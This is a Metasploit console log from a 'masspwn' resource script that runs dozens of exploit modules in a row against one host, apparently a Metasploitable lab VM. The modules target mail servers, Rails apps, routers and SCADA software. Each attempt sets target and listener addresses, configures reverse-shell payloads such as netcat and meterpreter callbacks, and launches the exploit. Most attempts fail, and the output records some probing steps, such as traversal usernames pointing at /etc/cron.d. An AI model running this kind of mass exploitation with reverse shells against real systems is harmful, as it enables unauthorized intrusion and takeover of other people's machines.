[*] Exploit running as background job 30.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/misc/polycom_hdx_auth_bypass
[*] Using configured payload cmd/unix/reverse_openssl
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2036
LPORT => 2036
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
[+] 10.0.1.6:23 - Detected telnetd on TCP
resource (masspwn.2974202.msf)> exploit -j -z
[*] 10.0.1.6:23 - Connecting to telnetd
[*] Exploit running as background job 31.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/misc/polycom_hdx_traceroute_exec
[*] Using configured payload cmd/unix/reverse
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2037
LPORT => 2037
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/scada/procyon_core_server
[*] Started reverse TCP double handler on 10.0.1.4:2037
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2038
LPORT => 2038
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 33.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/proxy/ccproxy_telnet_ping
[*] Started reverse TCP handler on 10.0.1.4:2038
[*] 10.0.1.6:23 - Sending request...
[-] 10.0.1.6:23 - Exploit aborted due to failure: unknown: 10.0.1.6:23 - Failed to connect to target service
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2039
LPORT => 2039
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 34.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/telnet/gamsoft_telsrv_username
[-] 10.0.1.6:22 SSH - Failed authentication
[*] 10.0.1.6:22 - Attempt to login as 'mobile' with password 'dottie'
[*] Started reverse TCP handler on 10.0.1.4:2039
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2040
LPORT => 2040
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 35.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/smtp/exim_gethostbyname_bof
[*] Started reverse TCP handler on 10.0.1.4:2040
[*] 10.0.1.6:23 - Trying target Windows 2000 Pro SP0/4 English REMOTE on host 10.0.1.6:23...
[*] 10.0.1.6:23 - Connected to telnet service... waiting several seconds.
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2041
LPORT => 2041
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:25 - Exploit failed: One or more options failed to validate: SENDER_HOST_ADDRESS.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/smtp/apache_james_exec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2042
LPORT => 2042
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 36.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/smtp/morris_sendmail_debug
[*] Using configured payload cmd/unix/reverse
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2043
LPORT => 2043
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 10.0.1.4:2042
[-] 10.0.1.6:25 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.0.1.6:4555).
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 37.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/smtp/opensmtpd_mail_from_rce
[*] Using configured payload cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2044
LPORT => 2044
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] 10.0.1.6:25 - Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password 'sIDOsPUoX'
[*] Started reverse TCP double handler on 10.0.1.4:2043
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 38.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/smtp/mercury_cram_md5
[-] 10.0.1.6:25 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Started reverse TCP handler on 10.0.1.4:2044
[*] 10.0.1.6:25 - Executing automatic check (disable AutoCheck to override)
[-] 10.0.1.6:25 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Enable ForceExploit to override check result.
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2045
LPORT => 2045
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:22 SSH - Failed authentication
[*] Exploit running as background job 39.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/smtp/mailcarrier_smtp_ehlo
[*] Started reverse TCP handler on 10.0.1.4:2045
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2046
LPORT => 2046
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 40.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/smtp/njstar_smtp_bof
[*] 10.0.1.6:25 - Trying target Mercury Mail Transport System 4.51...
[*] Started reverse TCP handler on 10.0.1.4:2046
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2047
LPORT => 2047
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 41.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/smtp/wmailserver
[*] Started reverse TCP handler on 10.0.1.4:2047
[*] 10.0.1.6:25 - Trying target Windows XP SP2/SP3...
[*] 10.0.1.6:25 - Sending the egg...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2048
LPORT => 2048
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
[*] 10.0.1.6:25 - Sending our buffer containing the egg hunter...
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 42.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/smtp/ms03_046_exchange2000_xexch50
[*] Started reverse TCP handler on 10.0.1.4:2048
[*] 10.0.1.6:25 - Trying target Windows 2000 Pro English All...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2049
LPORT => 2049
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 43.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/lotus/domino_icalendar_organizer
[*] Started reverse TCP handler on 10.0.1.4:2049
[*] 10.0.1.6:25 - Trying to exploit Exchange 2000 with address 0x0c900c90...
[*] 10.0.1.6:25 - Exploit attempt #1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2050
LPORT => 2050
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 44.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/wyse/hagent_untrusted_hsdata
[*] Started reverse TCP handler on 10.0.1.4:2050
[*] 10.0.1.6:25 - Trying target Lotus Domino 8.5 on Windows Server 2003 SP2
[*] 10.0.1.6:25 - Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[-] 10.0.1.6:25 - Remote service does not seem to be Lotus Domino 8.5
[*] 10.0.1.6:25 - Connected to SMTP server: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

[*] 10.0.1.6:25 - Target does not appear to be running Exchange.
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2051
LPORT => 2051
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 45.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/http/rails_xml_yaml_code_exec
[*] Started reverse TCP handler on 10.0.1.4:2051
[*] 10.0.1.6:80 - Connecting to the target
[*] 10.0.1.6:80 - Starting the FTP server

[-] 10.0.1.6:80 - Could not start the TCP server: Permission denied - bind(2) for 0.0.0.0:21.
[-] 10.0.1.6:80 - This module is configured to use a privileged TCP port (21). On Unix systems, only the root user account is allowed to bind to privileged ports.Please run the framework as root to use this module.
[-] 10.0.1.6:80 - On Microsoft Windows systems, this error is returned when a process attempts to listen on a host/port combination that is already in use. For example, Windows XP will return this error if a process attempts to bind() over the system SMB/NetBIOS services.

[-] 10.0.1.6:80 - Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:21
[*] No payload configured, defaulting to generic/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2052
LPORT => 2052
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 46.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/http/wp_dnd_mul_file_rce
[*] Started reverse TCP handler on 10.0.1.4:2052
[*] Sending Railsv2 request to 10.0.1.6:80...
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2053
LPORT => 2053
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 47.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/http/sonicwall_gms_upload
[*] 10.0.1.6:23 - Sending 20000 byte username as exploit (including 416 byte payload)...
[*] Started reverse TCP handler on 10.0.1.4:2053
[*] Sending Railsv3 request to 10.0.1.6:80...
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2054
LPORT => 2054
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: unexpected-reply: Nonce not found
[*] Started reverse double SSL handler on 10.0.1.4:2036
[*] 10.0.1.6:23 - Starting Authentication bypass with 6 threads with 100 max connections
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] 10.0.1.6:23 - Exploit sent...
[*] Exploit running as background job 48.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/http/rails_secret_deserialization
[*] Started reverse TCP handler on 10.0.1.4:2054
[*] Retrieving Tomcat installation path...
[*] No payload configured, defaulting to generic/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2055
[-] Exploit aborted due to failure: not-vulnerable: 10.0.1.6:80 - Unable to retrieve the Tomcat installation path
LPORT => 2055
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Exploit failed: One or more options failed to validate: SECRET.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/http/rails_json_yaml_code_exec
[*] No payload configured, defaulting to generic/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2056
LPORT => 2056
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 49.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/http/rails_actionpack_inline_exec
[*] Started reverse TCP handler on 10.0.1.4:2056
[*] Sending Railsv2 request to 10.0.1.6:80...
[*] No payload configured, defaulting to generic/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2057
LPORT => 2057
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
[*] Sending Railsv3 request to 10.0.1.6:80...
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 50.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/http/opmanager_socialit_file_upload
[*] Started reverse TCP handler on 10.0.1.4:2057
[*] Sending inline code to parameter: id
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2058
LPORT => 2058
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 51.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/cayin_cms_ntp
[*] Started reverse TCP handler on 10.0.1.4:2058
[*] Creating upload directories
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2059
LPORT => 2059
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 52.
[*] Exploit completed, but no session was created.
[*] Uploading WAR file...
resource (masspwn.2974202.msf)> use exploits/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
[*] Started reverse TCP handler on 10.0.1.4:2059
[-] Exploit aborted due to failure: unknown: 10.0.1.6:80 - WAR upload failed
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
[!] This exploit may require manual cleanup of 'state/archivedata/zip/HkYx0nFUqHWaSfSMli6' on the target
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2060
LPORT => 2060
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 53.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/trueonline_p660hn_v1_rce
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2061
LPORT => 2061
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 10.0.1.4:2060
[-] Exploit failed: NoMethodError undefined method `text' for nil:NilClass
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 54.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/netgear_dnslookup_cmd_exec
[*] 10.0.1.6:80 - Attempting to exploit router...
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2062
LPORT => 2062
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 55.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/tiki_calendar_exec
[*] Started reverse TCP handler on 10.0.1.4:2062
[-] Router is not a NETGEAR router
[*] Sending payload...
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2063
LPORT => 2063
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 56.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/netgear_wnr2000_rce
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
[*] Started reverse TCP handler on 10.0.1.4:2063
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2064
LPORT => 2064
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: unknown: Target does not have tiki-login_scr.php
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 57.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/crypttech_cryptolog_login_exec
[*] Using configured payload python/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2065
LPORT => 2065
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:80 - Trying the easy way out first
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 58.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/advantech_switch_bash_env_exec
[+] 10.0.1.6:80 - Success, shell incoming!
[*] Started reverse TCP handler on 10.0.1.4:2065
[*] Bypassing login by exploiting SQLi flaw
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
[-] Exploit aborted due to failure: unknown: Something went wrong.
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2066
LPORT => 2066
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:25 - 502 5.5.2 Error: command not recognized

[*] 10.0.1.6:25 - Target is not vulnerable.
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/centreon_useralias_exec
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2067
LPORT => 2067
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 59.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/mutiny_frontend_upload
[*] Started reverse TCP handler on 10.0.1.4:2067
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2068
LPORT => 2068
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 60.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/netgear_r7000_cgibin_exec
[*] Started reverse TCP handler on 10.0.1.4:2068
[*] Trying to login
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2069
LPORT => 2069
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: no-access: 10.0.1.6:80 - Login failed, review USERNAME and PASSWORD options
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 61.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/trueonline_billion_5200w_rce
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2070
LPORT => 2070
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 10.0.1.4:2069
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Router is not a NETGEAR router
[*] Exploit running as background job 62.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/trueonline_p660hn_v2_rce
[*] 10.0.1.6:80 - Attempting to exploit unauthenticated injection
[*] Using configured payload linux/mipsbe/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2071
LPORT => 2071
